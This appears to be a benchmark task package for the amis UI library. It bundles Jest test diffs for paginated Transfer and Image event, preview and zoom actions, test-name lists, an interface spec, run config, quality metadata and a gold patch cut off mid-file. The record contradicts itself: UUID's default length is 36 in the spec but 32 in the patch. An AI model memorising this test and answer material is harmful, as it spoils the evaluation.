HTMLInputElement)?.checked).toEqual(false); + + const nextBtn = container.querySelector('.cxd-Pagination-next')!; + fireEvent.click(nextBtn); + await wait(500); + + const checkboxes2 = container.querySelectorAll('input[type=checkbox]')!; + expect(checkboxes2.length).toEqual(11); + expect((checkboxes2[1] as HTMLInputElement)?.checked).toEqual(false); + expect((checkboxes2[2] as HTMLInputElement)?.checked).toEqual(true); + expect((checkboxes2[3] as HTMLInputElement)?.checked).toEqual(false); + expect((checkboxes2[4] as HTMLInputElement)?.checked).toEqual(true); +}) + +test.only('Renderer:Transfer with pagination and data source from data scope', async () => { + const mockData = [ + { + "label": "Laura Lewis", + "value": "1" + }, + { + "label": "David Gonzalez", + "value": "2" + }, + { + "label": "Christopher Rodriguez", + "value": "3" + }, + { + "label": "Sarah Young", + "value": "4" + }, + { + "label": "James Jones", + "value": "5" + }, + { + "label": "Larry Robinson", + "value": "6" + }, + { + "label": "Christopher Perez", + "value": "7" + }, + { + "label": "Sharon Davis", + "value": "8" + }, + { + "label": "Kenneth Anderson", + "value": "9" + }, + { + "label": "Deborah Lewis", + "value": "10" + }, + { + "label": "Jennifer Lewis", + "value": "11" + }, + { + "label": "Laura Miller", + "value": "12" + }, + { + "label": "Larry Harris", + "value": "13" + }, + { + "label": "Patricia Robinson", + "value": "14" + }, + { + "label": "Mark Davis", + "value": "15" + }, + { + "label": "Jessica Harris", + "value": "16" + }, + { + "label": "Anna Brown", + "value": "17" + }, + { + "label": "Lisa Young", + "value": "18" + }, + { + "label": "Donna Williams", + "value": "19" + }, + { + "label": "Shirley Davis", + "value": "20" + } + ]; + const fetcher = jest.fn().mockImplementation((api) => { + return Promise.resolve({ + data: { + status: 0, + msg: 'ok', + data: { + count: mockData.length, + items: mockData + } + } + }); + }); + const {container} = render( + amisRender( + { + "type": "form", + "debug": true, + "body": [ + { + "type": "service", + "api": { + "url": "/api/mock2/options/loadDataOnce", + "method": "get", + "responseData": { + "transferOptions": "${items}" + } + }, + body: [ + { + "label": "默认", + "type": "transfer", + "name": "transfer", + "joinValues": false, + "extractValue": false, + "source": "${transferOptions}", + "pagination": { + "enable": true, + "layout": ["pager", "perpage", "total"], + "popOverContainerSelector": ".cxd-Panel--form" + }, + "value": [ + {"label": "Laura Lewis", "value": "1", id: 1}, + {"label": "Christopher Rodriguez", "value": "3", id: 3}, + {"label": "Laura Miller", "value": "12", id: 12}, + {"label": "Patricia Robinson", "value": "14", id: 14} + ] + } + ] + } + ] + }, {}, makeEnv({fetcher}))); + + await wait(500); + expect(container.querySelector('.cxd-Transfer-footer-pagination')).toBeInTheDocument(); + + const checkboxes = container.querySelectorAll('input[type=checkbox]')!; + expect(checkboxes.length).toEqual(11); /** 包括顶部全选 */ + expect((checkboxes[1] as HTMLInputElement)?.checked).toEqual(true); + expect((checkboxes[2] as HTMLInputElement)?.checked).toEqual(false); + expect((checkboxes[3] as HTMLInputElement)?.checked).toEqual(true); + expect((checkboxes[4] as HTMLInputElement)?.checked).toEqual(false); + + const nextBtn = container.querySelector('.cxd-Pagination-next')!; + fireEvent.click(nextBtn); + await wait(500); + + const checkboxes2 = container.querySelectorAll('input[type=checkbox]')!; + expect(checkboxes2.length).toEqual(11); + expect((checkboxes2[1] as HTMLInputElement)?.checked).toEqual(false); + expect((checkboxes2[2] as HTMLInputElement)?.checked).toEqual(true); + expect((checkboxes2[3] as HTMLInputElement)?.checked).toEqual(false); + expect((checkboxes2[4] as HTMLInputElement)?.checked).toEqual(true); +}) diff --git a/packages/amis/__tests__/renderers/Image.test.tsx b/packages/amis/__tests__/renderers/Image.test.tsx index 45192f014..8fe8757ee 100644 --- a/packages/amis/__tests__/renderers/Image.test.tsx +++ b/packages/amis/__tests__/renderers/Image.test.tsx @@ -12,6 +12,10 @@ * 9. href * 10. 作为表单项 * 11. clickAction + * 12. click事件 + * 13. mouseenter / mouseleave 事件 + * 14. preview 预览动作 + * 15. zoom & maxScale & minScale 调整图片比例动作 * * * 组件名称:Images 图片集 * 内容说明:images 与 image 使用组件相同,相同属性不重复测试了 @@ -20,7 +24,7 @@ * 2. enlargeAble & originalSrc & source & title & description */ -import {fireEvent, render} from '@testing-library/react'; +import {fireEvent, render, waitFor} from '@testing-library/react'; import '../../src'; import {render as amisRender} from '../../src'; import {makeEnv, wait} from '../helper'; @@ -334,7 +338,228 @@ describe('Renderer:image', () => { }) ); fireEvent.click(container.querySelector('.cxd-Image-thumbWrap')!); - expect(getByText('这是一个弹框')!).toBeInTheDocument(); + await waitFor(() => { + expect(getByText('这是一个弹框')!).toBeInTheDocument(); + }); + }); + + test('image:click', async () => { + const notify = jest.fn(); + const {container, getByText} = render( + amisRender( + { + type: 'image', + src: 'https://internal-amis-res.cdn.bcebos.com/images/2020-1/1578395692722/4f3cb4202335.jpeg@s_0,w_216,l_1,f_jpg,q_80', + class: 'cursor-pointer', + onEvent: { + click: { + actions: [ + { + actionType: 'toast', + args: { + msgType: 'info', + msg: '派发点击事件' + } + } + ] + }, + mouseenter: { + actions: [ + { + actionType: 'toast', + args: { + msgType: 'info', + msg: '派发鼠标移入事件' + } + } + ] + }, + mouseleave: { + actions: [ + { + actionType: 'toast', + args: { + msgType: 'info', + msg: '派发鼠标移出事件' + } + } + ] + } + } + }, + {}, + makeEnv({ + notify, + session: 'image-test-action-1' + }) + ) + ); + fireEvent.click(container.querySelector('.cxd-Image-thumbWrap')!); + await waitFor(() => { + expect(notify).toHaveBeenCalledWith('info', '派发点击事件', { + msg: '派发点击事件', + msgType: 'info' + }); + }); + fireEvent.mouseEnter(container.querySelector('.cxd-Image-thumbWrap')!); + await waitFor(() => { + expect(notify).toHaveBeenCalledWith('info', '派发鼠标移入事件', { + msg: '派发鼠标移入事件', + msgType: 'info' + }); + }); + fireEvent.mouseLeave(container.querySelector('.cxd-Image-thumbWrap')!); + await waitFor(() => { + expect(notify).toHaveBeenCalledWith('info', '派发鼠标移出事件', { + msg: '派发鼠标移出事件', + msgType: 'info' + }); + }); + }); + + test('image:preview 预览动作', async () => { + const {container, getByText, baseElement} = render( + amisRender({ + type: 'page', + body: [ + { + type: 'image', + id: 'previewImage', + src: 'https://internal-amis-res.cdn.bcebos.com/images/2020-1/1578395692722/4f3cb4202335.jpeg@s_0,w_216,l_1,f_jpg,q_80', + originalSrc: + 'https://internal-amis-res.cdn.bcebos.com/images/2020-1/1578395692722/4f3cb4202335.jpeg' + }, + { + type: 'button', + label: '预览图片', + onEvent: { + click: { + actions: [ + { + actionType: 'preview', + componentId: 'previewImage' + } + ] + } + } + } + ] + }) + ); + expect(container).toMatchSnapshot(); + fireEvent.click(getByText('预览图片')); + expect(baseElement.querySelector('.cxd-ImageGallery')!).toBeInTheDocument(); + expect( + baseElement.querySelector('.cxd-ImageGallery .cxd-ImageGallery-main img')! + ).toHaveAttribute( + 'src', + 'https://internal-amis-res.cdn.bcebos.com/images/2020-1/1578395692722/4f3cb4202335.jpeg' + ); + }); + + test('image:zoom & maxScale & minScale 调整图片比例动作', async () => { + const {container, getByText, baseElement} = render( + amisRender({ + type: 'page', + body: [ + { + type: 'image', + id: 'zoomImage', + src: 'https://internal-amis-res.cdn.bcebos.com/images/2020-1/1578395692722/4f3cb4202335.jpeg@s_0,w_216,l_1,f_jpg,q_80', + originalSrc: + 'https://internal-amis-res.cdn.bcebos.com/images/2020-1/1578395692722/4f3cb4202335.jpeg', + maxScale: 200, + minScale: 20 + }, + { + type: 'button', + label: '放大图片', + onEvent: { + click: { + actions: [ + { + actionType: 'zoom', + args: { + scale: 50 + }, + componentId: 'zoomImage' + } + ] + } + } + }, + { + type: 'button', + label: '缩小图片', + onEvent: { + click: { + actions: [ + { + actionType: 'zoom', + args: { + scale: -50 + }, + componentId: 'zoomImage' + } + ] + } + } + } + ] + }) + ); + expect(container).toMatchSnapshot(); + + const imgIns = baseElement.querySelector('.cxd-ImageField--thumb')!; + expect(imgIns).toHaveStyle({ + transform: 'scale(1)' + }); + + fireEvent.click(getByText('放大图片')); + await waitFor(() => { + expect(imgIns).toHaveStyle({ + transform: 'scale(1.5)' + }); + }); + + fireEvent.click(getByText('缩小图片')); + await waitFor(() => { + expect(imgIns).toHaveStyle({ + transform: 'scale(1)' + }); + }); + + fireEvent.click(getByText('放大图片')); + fireEvent.click(getByText('放大图片')); + await waitFor(() => { + expect(imgIns).toHaveStyle({ + transform: 'scale(2)' + }); + }); + + fireEvent.click(getByText('放大图片')); + await waitFor(() => { + expect(imgIns).toHaveStyle({ + transform: 'scale(2)' + }); + }); + + fireEvent.click(getByText('缩小图片')); + fireEvent.click(getByText('缩小图片')); + fireEvent.click(getByText('缩小图片')); + fireEvent.click(getByText('缩小图片')); + await waitFor(() => { + expect(imgIns).toHaveStyle({ + transform: 'scale(0.2)' + }); + }); + + fireEvent.click(getByText('缩小图片')); + await waitFor(() => { + expect(imgIns).toHaveStyle({ + transform: 'scale(0.2)' + }); + }); }); }); diff --git a/packages/amis/__tests__/renderers/__snapshots__/Image.test.tsx.snap b/packages/amis/__tests__/renderers/__snapshots__/Image.test.tsx.snap index 5644d719b..db441d13c 100644 --- a/packages/amis/__tests__/renderers/__snapshots__/Image.test.tsx.snap +++ b/packages/amis/__tests__/renderers/__snapshots__/Image.test.tsx.snap @@ -56,6 +56,7 @@ exports[`Renderer:image image as form item 1`] = ` > <div class="cxd-ImageField cxd-ImageField--thumb" + style="transform: scale(1);" > <div class="cxd-Image cxd-Image--thumb no-border" @@ -103,6 +104,7 @@ exports[`Renderer:image image:basic 1`] = ` <div> <div class="cxd-ImageField cxd-ImageField--thumb show" + style="transform: scale(1);" > <div class="cxd-Image cxd-Image--thumb" @@ -138,6 +140,7 @@ exports[`Renderer:image image:enlargeAble & originalSrc & enlargeTitle & showToo <div> <div class="cxd-ImageField cxd-ImageField--thumb" + style="transform: scale(1);" > <div class="cxd-Image cxd-Image--thumb" @@ -178,6 +181,7 @@ exports[`Renderer:image image:enlargeAble & originalSrc & enlargeTitle & showToo <div> <div class="cxd-ImageField cxd-ImageField--thumb" + style="transform: scale(1);" > <div class="cxd-Image cxd-Image--thumb" @@ -231,6 +235,7 @@ exports[`Renderer:image image:href 1`] = ` > <div class="cxd-ImageField cxd-ImageField--thumb" + style="transform: scale(1);" > <a class="cxd-Link" @@ -263,10 +268,62 @@ exports[`Renderer:image image:href 1`] = ` </div> `; +exports[`Renderer:image image:preview 预览动作 1`] = ` +<div> + <div + class="cxd-Page" + > + <div + class="cxd-Page-content" + > + <div + class="cxd-Page-main" + > + <div + class="cxd-Page-body" + role="page-body" + > + <div + class="cxd-ImageField cxd-ImageField--thumb" + style="transform: scale(1);" + > + <div + class="cxd-Image cxd-Image--thumb" + > + <div + class="cxd-Image-thumbWrap" + > + <div + class="cxd-Image-thumb cxd-Image-thumb--contain cxd-Image-thumb--1-1" + > + <img + class="cxd-Image-image" + src="https://internal-amis-res.cdn.bcebos.com/images/2020-1/1578395692722/4f3cb4202335.jpeg@s_0,w_216,l_1,f_jpg,q_80" + /> + </div> + </div> + </div> + </div> + <button + class="cxd-Button cxd-Button--default cxd-Button--size-default" + type="button" + > + <span> + 预览图片 + </span> + </button> + </div> + </div> + </div> + </div> +</div> +`; + exports[`Renderer:image image:title & imageCaption 1`] = ` <div> <div class="cxd-ImageField cxd-ImageField--thumb" + style="transform: scale(1);" > <div class="cxd-Image cxd-Image--thumb" @@ -308,6 +365,7 @@ exports[`Renderer:image image:width & height 1`] = ` <div> <div class="cxd-ImageField cxd-ImageField--thumb" + style="transform: scale(1);" > <div class="cxd-Image cxd-Image--thumb" @@ -330,6 +388,65 @@ exports[`Renderer:image image:width & height 1`] = ` </div> `; +exports[`Renderer:image image:zoom & maxScale & minScale 调整图片比例动作 1`] = ` +<div> + <div + class="cxd-Page" + > + <div + class="cxd-Page-content" + > + <div + class="cxd-Page-main" + > + <div + class="cxd-Page-body" + role="page-body" + > + <div + class="cxd-ImageField cxd-ImageField--thumb" + style="transform: scale(1);" + > + <div + class="cxd-Image cxd-Image--thumb" + > + <div + class="cxd-Image-thumbWrap" + > + <div + class="cxd-Image-thumb cxd-Image-thumb--contain cxd-Image-thumb--1-1" + > + <img + class="cxd-Image-image" + src="https://internal-amis-res.cdn.bcebos.com/images/2020-1/1578395692722/4f3cb4202335.jpeg@s_0,w_216,l_1,f_jpg,q_80" + /> + </div> + </div> + </div> + </div> + <button + class="cxd-Button cxd-Button--default cxd-Button--size-default" + type="button" + > + <span> + 放大图片 + </span> + </button> + <button + class="cxd-Button cxd-Button--default cxd-Button--size-default" + type="button" + > + <span> + 缩小图片 + </span> + </button> + </div> + </div> + </div> + </div> +</div> +`; + exports[`Renderer:images images:basic 1`] = ` <div> <div diff --git a/packages/amis/__tests__/renderers/__snapshots__/Table.test.tsx.snap b/packages/amis/__tests__/renderers/__snapshots__/Table.test.tsx.snap index f12dfcf5d..03dcd4b28 100644 --- a/packages/amis/__tests__/renderers/__snapshots__/Table.test.tsx.snap +++ b/packages/amis/__tests__/renderers/__snapshots__/Table.test.tsx.snap @@ -7090,6 +7090,7 @@ exports[`Renderer:table list 1`] = ` > <div class="cxd-ImageField cxd-ImageField--thumb" + style="transform: scale(1);" > <div class="cxd-Image cxd-Image--thumb" @@ -7331,6 +7332,7 @@ exports[`Renderer:table list 1`] = ` > <div class="cxd-ImageField cxd-ImageField--thumb" + style="transform: scale(1);" > <div class="cxd-Image cxd-Image--thumb" @@ -7692,6 +7694,7 @@ exports[`Renderer:table list 1`] = ` > <div class="cxd-ImageField cxd-ImageField--thumb" + style="transform: scale(1);" > <div class="cxd-Image cxd-Image--thumb"
[ "evalute:UUID" ]
[ "lexer:simple", "lexer:filter", "lexer:exception", "evalute:simple", "evalute:filter", "evalute:filter2", "evalute:filter3", "evalute:filter4", "evalute:keywords", "evalute:oldVariable", "evalute:ariable2", "evalute:ariable3", "evalute:object-variable", "evalute:literal-variable", "evalute:tempalte", "evalute:literal", "evalute:variableName", "evalute:3-1", "evalate:0.1+0.2", "evalute:variable:com.xxx.xx", "evalute:anonymous:function", "evalute:anonymous:function2", "evalute:array:func", "evalute:ISTYPE", "evalute:Math", "evalute:namespace", "evalute:speical characters", "parser:simple", "parser:complex", "parser:evalMode", "parser:template", "parser:string", "parser:number", "parser:single-string", "parser:object-literall", "parser:array-literall", "parser:variable-geter", "parser:variable-geter2", "parser:multi-expression", "parser:functionCall", "parser:filter", "parser:filter-escape", "parser:conditional", "parser:binary-expression", "parser:group-expression", "parser:unary-expression", "parser:anonymous-function", "formula:expression", "formula:expression2", "formula:expression3", "formula:if", "formula:and", "formula:or", "formula:xor", "formula:ifs", "formula:math", "formula:text", "formula:date", "formula:last", "formula:basename", "formula:customFunction", "async-evalute:namespace" ]
Method: UUID(length?: number) → string Location: packages/amis-formula/src/evalutor.ts (Evaluator class) Inputs: - length (optional, number) – Desired length of the generated UUID string. If omitted, defaults to 36 characters. Outputs: - Returns a UUID‑like string (hex characters with hyphens) truncated or padded to the specified length. Description: Generates a UUID string. The length parameter controls how many characters of the UUID are returned (maximum 36). Used in the formula evaluator as the function `${UUID()}` or `${UUID(8)}`. Function: Image (props) Location: packages/amis/src/renderers/Image.tsx (ImageField component) Inputs: - src: string – Thumbnail image URL (required). - originalSrc?: string – URL of the original image for preview. - enlargeAble?: boolean – Whether the image can be enlarged. - enlargeTitle?: string – Title shown in the preview dialog. - enlargeCaption?: string – Caption shown in the preview dialog. - enlargeWithGallary?: boolean – If true (default) shows all images in gallery mode when previewed from a table. - showToolbar?: boolean – Show toolbar in preview mode. - toolbarActions?: ImageAction[] – List of toolbar actions (rotate, zoom, etc.). - maxScale?: number | string – Maximum allowed zoom percentage for the “zoom” action (default 200). - minScale?: number | string – Minimum allowed zoom percentage for the “zoom” action (default 50). - onEvent?: { click?: {actions: ActionObject[]}, mouseenter?: {actions: ActionObject[]}, mouseleave?: {actions: ActionObject[]} } – Event map allowing actions to be dispatched on click, mouse‑enter, and mouse‑leave. - onClick?: (event: React.MouseEvent, props: any) | string | Function – Shortcut click handler (used via onEvent internally). - Other standard image props (className, width, height, title, placeholder, etc.). Outputs: - Renders an image thumbnail. Clicking opens a preview dialog if `enlargeAble` is true. Actions “preview” and “zoom” can be triggered externally via component actions. Description: Enhanced image renderer that now supports click/mouseenter/mouseleave events, preview action, and zoom action with configurable scaling limits. Component: Transfer (props) Location: packages/amis-ui/src/components/Transfer.tsx (Transfer component) Inputs: - source: string | API – Data source for left options (can include `${page}` and `${perPage}` placeholders for pagination). - options?: Option[] – Static left‑side options. - value?: any[] – Currently selected values. - onChange?: (value: any[]) => void – Callback when selection changes. - pagination?: { enable: boolean, // Turn on pagination for the left list. className?: string, // CSS class for the pagination container. layout?: string | string[], // Order of pagination parts (e.g., ["pager","perpage","total"]). perPageAvailable?: number[], // Options for items‑per‑page selector. maxButtons?: number, // Max number of page buttons (min 5). Default 5. popOverContainerSelector?: string, // Selector for the pop‑over container when pagination is rendered inside a pop‑over. // Internal fields populated from the data source (not set by the user): page?: number, // Current page number (derived from data source). perPage?: number, // Current page size (derived from data source). total?: number // Total item count (derived from data source). } - onPageChange?: (page: number, perPage?: number, direction?: 'forward' | 'backward') => void – Fires when the user changes page or page size. Outputs: - Renders left and right panels with selectable items. When `pagination.enable` is true, a pagination footer appears below the left panel. Changing pages triggers `onPageChange` and loads the next slice of options from the source. Description: Transfer control now supports paginated left‑side options, with configuration via the `pagination` prop and a callback to react to page changes. It also accumulates loaded options for proper right‑panel rendering across pages.
custom-check-github
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "cd packages/amis-formula && npx jest --verbose --no-color" }
{ "num_modified_files": 65, "num_modified_lines": 2247, "pr_author": "lurunze1226", "pr_labels": [ "feat" ], "llm_metadata": { "code": "B5", "code_quality": null, "confidence": 0.9, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": true, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://github.com/baidu/amis/pull/8629/files?diff=unified&w=0#diff-01999eae047ec7fdb8502c22801699d39f7a54c994a9414462c0fbe21634ecd8R1074-R1083", "https://github.com/baidu/amis/pull/8629/files?diff=unified&w=0#diff-01999eae047ec7fdb8502c22801699d39f7a54c994a9414462c0fbe21634ecd8R1093-R1096" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "core_feat", "dev_ops_enh" ], "reason": null, "reasoning": "The issue only mentions adding three new options to InputTable's schema, but the supplied test patch modifies many unrelated test files, documentation, and component code across the repository, which does not align with the stated intent. This mismatch indicates that the patch contains unrelated changes, a classic case of PATCH_ARTIFACTS (B5). The issue description lacks detailed acceptance criteria, making the intent incomplete. The tests are not aligned with the feature request, and the primary problem is the extraneous test changes.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Tests modify many unrelated components (CRUD, Image, Table, etc.) instead of focusing on InputTable", "Added tests for new features not described in the issue (e.g., UUID, pagination, image events)", "Documentation and mock files unrelated to InputTable are altered" ], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
f9ef0497960713963a42f9f52b63d18fcf1bf9f8
2023-11-07 03:35:48
github-actions[bot]: <!-- Labeler (https://github.com/jimschubert/labeler) --> 👍 Thanks for this! 🏷 I have applied any labels matching special text in your issue. Please review the labels and make any necessary changes.
baidu__amis-8641
diff --git a/packages/amis-core/src/store/crud.ts b/packages/amis-core/src/store/crud.ts index 3eb535c6d..d213b5f28 100644 --- a/packages/amis-core/src/store/crud.ts +++ b/packages/amis-core/src/store/crud.ts @@ -161,10 +161,10 @@ export const CRUDStore = ServiceStore.named('CRUDStore') rule => rule.includes(lhs) && rule.includes(rhs) ) ) { - return lhs === rhs; + return lhs !== rhs; } - return lhs == rhs; + return lhs != rhs; }) ) { if (query[pageField || 'page']) { diff --git a/packages/amis-editor-core/src/plugin.ts b/packages/amis-editor-core/src/plugin.ts index 30174d640..f690c34eb 100644 --- a/packages/amis-editor-core/src/plugin.ts +++ b/packages/amis-editor-core/src/plugin.ts @@ -304,7 +304,9 @@ export interface RendererInfo extends RendererScaffoldInfo { sharedContext?: Record<string, any>; dialogTitle?: string; //弹窗标题用于弹窗大纲的展示 dialogType?: string; //区分确认对话框类型 - subEditorVariable?: Array<{label: string; children: any}>; // 传递给子编辑器的组件自定义变量,如listSelect的选项名称和值 + getSubEditorVariable?: ( + schema?: any + ) => Array<{label: string; children: any}>; // 传递给子编辑器的组件自定义变量,如listSelect的选项名称和值 } export type BasicRendererInfo = Omit< @@ -1051,7 +1053,7 @@ export abstract class BasePlugin implements PluginInterface { isListComponent: plugin.isListComponent, rendererName: plugin.rendererName, memberImmutable: plugin.memberImmutable, - subEditorVariable: plugin.subEditorVariable + getSubEditorVariable: plugin.getSubEditorVariable }; } } diff --git a/packages/amis-editor-core/src/util.ts b/packages/amis-editor-core/src/util.ts index ba099172a..cceedf751 100644 --- a/packages/amis-editor-core/src/util.ts +++ b/packages/amis-editor-core/src/util.ts @@ -1224,7 +1224,10 @@ export async function resolveVariablesFromScope(node: any, manager: any) { // 子编辑器内读取的host节点自定义变量,非数据域方式,如listSelect的选项值 let hostNodeVaraibles = []; if (manager?.store?.isSubEditor) { - hostNodeVaraibles = manager.config?.hostNode?.info?.subEditorVariable || []; + hostNodeVaraibles = + manager.config?.hostNode?.info?.getSubEditorVariable?.( + manager.config?.hostNode.schema + ) || []; } const variables: VariableItem[] = diff --git a/packages/amis-editor/src/plugin/Calendar.tsx b/packages/amis-editor/src/plugin/Calendar.tsx index 7f854725c..d4695e697 100644 --- a/packages/amis-editor/src/plugin/Calendar.tsx +++ b/packages/amis-editor/src/plugin/Calendar.tsx @@ -20,7 +20,7 @@ export class CalendarPlugin extends BasePlugin { panelTitle = '日历日程'; description = '展示日历及日程。'; - docLink = '/amis/zh-CN/components/calendor'; + docLink = '/amis/zh-CN/components/calendar'; tags = ['展示']; scaffold = { diff --git a/packages/amis-editor/src/plugin/Form/ListSelect.tsx b/packages/amis-editor/src/plugin/Form/ListSelect.tsx index c6574400a..e97724ca8 100644 --- a/packages/amis-editor/src/plugin/Form/ListSelect.tsx +++ b/packages/amis-editor/src/plugin/Form/ListSelect.tsx @@ -109,21 +109,26 @@ export class ListControlPlugin extends BasePlugin { } ]; - subEditorVariable: Array<{label: string; children: any}> = [ - { - label: '当前选项', - children: [ - { - label: '选项名称', - value: 'label' - }, - { - label: '选项值', - value: 'value' - } - ] - } - ]; + getSubEditorVariable(schema: any): Array<{label: string; children: any}> { + let labelField = schema?.labelField || 'label'; + let valueField = schema?.valueField || 'value'; + + return [ + { + label: '当前选项', + children: [ + { + label: '选项名称', + value: labelField + }, + { + label: '选项值', + value: valueField + } + ] + } + ]; + } panelBodyCreator = (context: BaseEventContext) => { return formItemControl( @@ -201,7 +206,7 @@ export class ListControlPlugin extends BasePlugin { body: [ { type: 'tpl', - tpl: `\${${this.getDisplayField(value)}}`, + tpl: `\${${this.getDisplayField(data)}}`, wrapperComponent: '', inline: true } @@ -275,16 +280,7 @@ export class ListControlPlugin extends BasePlugin { } getDisplayField(data: any) { - if ( - data.source || - (data.map && - Array.isArray(data.map) && - data.map[0] && - Object.keys(data.map[0]).length > 1) - ) { - return data.labelField ?? 'label'; - } - return 'label'; + return data?.labelField ?? 'label'; } editDetail(id: string, field: string) { diff --git a/packages/amis-editor/src/plugin/SwitchContainer.tsx b/packages/amis-editor/src/plugin/SwitchContainer.tsx index 05dd08adc..1852a11f4 100644 --- a/packages/amis-editor/src/plugin/SwitchContainer.tsx +++ b/packages/amis-editor/src/plugin/SwitchContainer.tsx @@ -321,6 +321,7 @@ export class SwitchContainerPlugin extends LayoutBasePlugin { name: 'items', label: '状态列表', addTip: '新增组件状态', + minLength: 1, items: [ { type: 'input-text', @@ -356,6 +357,10 @@ export class SwitchContainerPlugin extends LayoutBasePlugin { title: '外观', className: 'p-none', body: getSchemaTpl('collapseGroup', [ + getSchemaTpl('theme:base', { + collapsed: false, + extra: [] + }), { title: '布局', body: [ @@ -460,7 +465,15 @@ export class SwitchContainerPlugin extends LayoutBasePlugin { getSchemaTpl('layout:stickyPosition') ] }, - ...getSchemaTpl('theme:common', {exclude: ['layout']}) + { + title: '自定义样式', + body: [ + { + type: 'theme-cssCode', + label: false + } + ] + } ]) }, { diff --git a/packages/amis-editor/src/renderer/ListItemControl.tsx b/packages/amis-editor/src/renderer/ListItemControl.tsx index 4754bf48c..26117f8bf 100644 --- a/packages/amis-editor/src/renderer/ListItemControl.tsx +++ b/packages/amis-editor/src/renderer/ListItemControl.tsx @@ -7,7 +7,7 @@ import {findDOMNode} from 'react-dom'; import cx from 'classnames'; import get from 'lodash/get'; import Sortable from 'sortablejs'; -import {FormItem, Button, Icon, render as amisRender} from 'amis'; +import {FormItem, Button, Icon, render as amisRender, toast} from 'amis'; import {autobind} from 'amis-editor-core'; import type {Option} from 'amis'; import {createObject, FormControlProps} from 'amis-core'; @@ -30,7 +30,6 @@ export type SourceType = 'custom' | 'api' | 'apicenter' | 'variable'; export interface OptionControlState { items: Array<PlainObject>; - api: SchemaApi; labelField: string; valueField: string; } @@ -50,7 +49,6 @@ export default class ListItemControl extends React.Component< this.state = { items: this.transformOptions(props), - api: props.data.source, labelField: props.data.labelField || 'title', valueField: props.data.valueField }; @@ -173,6 +171,12 @@ export default class ListItemControl extends React.Component< */ handleDelete(index: number) { const items = this.state.items.concat(); + const minLength = this.props.minLength; + + if (minLength > 0 && items.length <= minLength) { + toast.warning(`列表项数目不能少于${minLength}`); + return; + } items.splice(index, 1); this.setState({items}, () => this.onChange()); diff --git a/packages/amis-formula/src/doc.md b/packages/amis-formula/src/doc.md index 37b95f335..ea51e564c 100644 --- a/packages/amis-formula/src/doc.md +++ b/packages/amis-formula/src/doc.md @@ -591,6 +591,16 @@ 返回:a.json`。 +### UUID + +用法:`UUID(8)` + + * `length:number` 生成的UUID字符串长度,默认为32位 + +返回:`string` 生成的UUID字符串 + +生成UUID字符串 + ## 日期函数 ### DATE diff --git a/packages/amis-formula/src/doc.ts b/packages/amis-formula/src/doc.ts index 5291b3029..8ad4d61eb 100644 --- a/packages/amis-formula/src/doc.ts +++ b/packages/amis-formula/src/doc.ts @@ -1022,6 +1022,23 @@ export const doc: { }, namespace: '文本函数' }, + { + name: 'UUID', + description: '生成UUID字符串', + example: 'UUID(8)', + params: [ + { + type: 'number', + name: 'length', + description: '生成的UUID字符串长度,默认为32位' + } + ], + returns: { + type: 'string', + description: '生成的UUID字符串' + }, + namespace: '文本函数' + }, { name: 'DATE', description: diff --git a/packages/amis-formula/src/evalutor.ts b/packages/amis-formula/src/evalutor.ts index 92cdc2f67..e44b570c3 100644 --- a/packages/amis-formula/src/evalutor.ts +++ b/packages/amis-formula/src/evalutor.ts @@ -1514,6 +1514,21 @@ export class Evaluator { return text.split(/[\\/]/).pop(); } + /** + * 生成UUID字符串 + * + * @param {number} length - 生成的UUID字符串长度,默认为32位 + * @example UUID() + * @example UUID(8) + * @namespace 文本函数 + * + * @returns {string} 生成的UUID字符串 + */ + fnUUID(length: number = 32) { + const len = Math.min(Math.max(length, 0), 32); + return uuidv4().slice(0, len); + } + // 日期函数 /** @@ -2414,3 +2429,25 @@ export function createObject( return obj; } + +export function createStr() { + return ( + '00000000000000000' + (Math.random() * 0xffffffffffffffff).toString(16) + ).slice(-16); +} + +export function uuidv4() { + const a = createStr(); + const b = createStr(); + return ( + a.slice(0, 8) + + '-' + + a.slice(8, 12) + + '-4' + + a.slice(13) + + '-a' + + b.slice(1, 4) + + '-' + + b.slice(4) + ); +} diff --git a/packages/amis-ui/src/components/Range.tsx b/packages/amis-ui/src/components/Range.tsx index 333110fed..a074df720 100644 --- a/packages/amis-ui/src/components/Range.tsx +++ b/packages/amis-ui/src/components/Range.tsx @@ -383,11 +383,16 @@ export class Range extends React.Component<RangeItemProps, any> { getStepValue(value: number, step: number) { const surplus = value % step; let result = 0; + let closeNum = Math.floor(value - (value % step)); // 余数 >= 步长一半 -> 向上取 // 余数 < 步长一半 -> 向下取 const _value = surplus >= step / 2 ? value : safeSub(value, step); while (result <= _value) { - result = safeAdd(result, step); + if (step < 1 || result === 0 || result === closeNum) { + result = safeAdd(result, step); + } else { + result = closeNum; + } } return result; } diff --git a/packages/amis/src/renderers/CRUD.tsx b/packages/amis/src/renderers/CRUD.tsx index 570985640..2c1094b92 100644 --- a/packages/amis/src/renderers/CRUD.tsx +++ b/packages/amis/src/renderers/CRUD.tsx @@ -2218,7 +2218,7 @@ export default class CRUD extends React.Component<CRUDProps, any> { toolbar.align || (type === 'pagination' ? 'right' : 'left'); return ( <div - key={index} + key={toolbar.id || index} className={cx( 'Crud-toolbar-item', align ? `Crud-toolbar-item--${align}` : '', diff --git a/packages/amis/src/renderers/Each.tsx b/packages/amis/src/renderers/Each.tsx index a5234d45a..f66f0792f 100644 --- a/packages/amis/src/renderers/Each.tsx +++ 